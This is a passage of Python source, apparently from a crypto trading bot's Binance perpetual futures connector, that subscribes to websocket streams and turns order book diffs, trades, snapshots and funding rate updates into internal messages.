(CONSTANTS.TRADE_STREAM_ID, "@aggTrade"), (CONSTANTS.FUNDING_INFO_STREAM_ID, "@markPrice"), ] for stream_id, channel in stream_id_channel_pairs: params = [] for trading_pair in self._trading_pairs: symbol = await self.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) params.append(f"{symbol.lower()}{channel}") payload = { "method": "SUBSCRIBE", "params": params, "id": stream_id, } subscribe_request: WSRequest = WSRequest(payload) await ws.send(subscribe_request) return ws async def listen_for_subscriptions(self): ws = None while True: try: ws = await self._subscribe_to_order_book_streams() async for msg in ws.iter_messages(): if "result" in msg.data: continue if "@depth" in msg.data["stream"]: self._message_queue[CONSTANTS.DIFF_STREAM_ID].put_nowait(msg) elif "@aggTrade" in msg.data["stream"]: self._message_queue[CONSTANTS.TRADE_STREAM_ID].put_nowait(msg) elif "@markPrice" in msg.data["stream"]: self._message_queue[CONSTANTS.FUNDING_INFO_STREAM_ID].put_nowait(msg) except asyncio.CancelledError: raise except Exception: self.logger().error( "Unexpected error with Websocket connection. Retrying after 30 seconds...", exc_info=True ) await self._sleep(30.0) finally: ws and await ws.disconnect() async def listen_for_order_book_diffs(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: msg = await self._message_queue[CONSTANTS.DIFF_STREAM_ID].get() timestamp: float = time.time() msg.data["data"]["s"] = await self.convert_from_exchange_trading_pair( exchange_trading_pair=msg.data["data"]["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) order_book_message: OrderBookMessage = BinancePerpetualOrderBook.diff_message_from_exchange( msg.data, timestamp ) output.put_nowait(order_book_message) async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: msg = await self._message_queue[CONSTANTS.TRADE_STREAM_ID].get() msg.data["data"]["s"] = await self.convert_from_exchange_trading_pair( exchange_trading_pair=msg.data["data"]["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) trade_message: OrderBookMessage = BinancePerpetualOrderBook.trade_message_from_exchange(msg.data) output.put_nowait(trade_message) async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: try: for trading_pair in self._trading_pairs: snapshot: Dict[str, Any] = await self.get_snapshot( trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory ) snapshot_timestamp: float = time.time() snapshot_msg: OrderBookMessage = BinancePerpetualOrderBook.snapshot_message_from_exchange( snapshot, snapshot_timestamp, metadata={"trading_pair": trading_pair} ) output.put_nowait(snapshot_msg) self.logger().debug(f"Saved order book snapshot for {trading_pair}") delta = CONSTANTS.ONE_HOUR - time.time() % CONSTANTS.ONE_HOUR await self._sleep(delta) except asyncio.CancelledError: raise except Exception: self.logger().error( "Unexpected error occurred fetching orderbook snapshots. Retrying in 5 seconds...", exc_info=True ) await self._sleep(5.0) async def listen_for_funding_info(self): """ Listen for funding information events received through the websocket channel to update the respective FundingInfo for all active trading pairs. """ while True: try: funding_info_message: WSResponse = await self._message_queue[CONSTANTS.FUNDING_INFO_STREAM_ID].get() data: Dict[str, Any] = funding_info_message.data["data"] trading_pair: str = await self.convert_from_exchange_trading_pair( exchange_trading_pair=data["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) if trading_pair not in self._trading_pairs: continue self._funding_info.update( { trading_pair: FundingInfo( trading_pair=trading_pair, index_price=Decimal(data["i"]), mark_price=Decimal(data["p"]), next_funding_utc_timestamp=int(data["T"]), rate=Decimal(data["r"]), ) } ) except asyncio.CancelledError: raise except Exception as e: self.logger().error( f"Unexpected error occured updating funding information. Retrying in 5 seconds... Error: {str(e)}", exc_info=True, ) await self._sleep(5.0)
python